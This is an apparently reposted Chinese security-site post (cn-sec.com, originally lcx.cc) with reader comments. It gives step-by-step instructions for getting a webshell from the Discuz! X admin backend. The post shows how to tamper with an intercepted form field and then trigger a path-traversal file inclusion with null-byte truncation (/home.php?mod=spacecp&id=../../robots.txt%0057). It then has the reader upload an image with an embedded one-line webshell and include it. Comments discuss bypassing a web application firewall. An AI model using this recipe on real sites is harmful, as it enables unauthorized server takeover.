dz x 后台拿shell

admin 2021年4月3日19:22:05评论62 views字数 1121阅读3分44秒阅读模式

用户 - 用户栏目 - 栏目分组 抓包

Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改为

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

虽然涉及0x00截断 但无视 GPC

source


zafe 发表于 2013-5-24 10:22

*********************************************************************

说下具体怎么利用

原帖测试的是dz x3,我测试的是dz x2.5  无视gpc

*********************************************************************

首先进后台,抓个包

把这里

settingnew[profilegroupnew][base][available]

改成

settingnew[profilegroupnew][plugin][available]

提交

访问

/home.php?mod=spacecp&id=../../robots.txt%0057

这里你要是天真的点保存就错了

其实这里是个包含漏洞(我也没看代码,猜的)

所以先用edjpgcom.exe合成了生成一句话的图片

上传后找到路径

当然改头像也可以

最后爆菊

留言评论(旧系统):

安静的石头 @ 2013-05-24 11:02:47

昨天刚搞定了一个。嘿嘿。

本站回复:

恭喜恭喜!

佚名 @ 2013-05-24 17:26:10

请在这里填写留言内容,最长不超过 1000 字。

本站回复:

[暂无回复]

bean @ 2013-05-24 17:27:48

截断有限制没?是全版本漏洞?

本站回复:

具体不清楚

小样 @ 2013-05-25 10:07:52

windows截不了。。

本站回复:

╮(╯_╰)╭

佚名 @ 2013-05-26 12:00:19

这个 可以无视安全狗吗

本站回复:

自己试试不就知道了。

悟空 @ 2013-05-27 09:33:19

dz x 后台拿shell漏洞分析 http://p.t.qq.com/longweibo/index.php?lid=18419595405048586915

本站回复:

神经病 @ 2014-05-21 21:17:16

如果你能提供dz的官方论坛admin密码,我相信还是能测试成功的。

本站回复:

-_-|||

文章来源于lcx.cc:dz x 后台拿shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:22:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dz x 后台拿shellhttps://cn-sec.com/archives/321864.html

发表评论

匿名网友 填写信息